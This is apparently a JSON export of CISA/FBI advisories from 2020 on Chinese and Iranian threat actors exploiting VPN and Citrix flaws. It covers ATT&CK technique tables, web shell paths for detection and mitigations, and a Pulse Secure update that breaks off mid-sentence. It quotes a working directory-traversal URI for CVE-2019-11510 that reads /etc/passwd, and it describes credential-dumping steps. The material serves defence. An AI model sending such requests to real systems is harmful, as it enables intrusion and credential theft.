K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T15:10:11", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T15:33:15", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse>) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n## Background\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/>) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/>) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133>) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021>) for _Lateral Movement _[[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/>) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486 ]](<https://attack.mitre.org/versions/v7/techniques/T1486>) for impact, as well as\n * _Exfiltration _[[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/>) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5/acc`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5/acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297>),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump 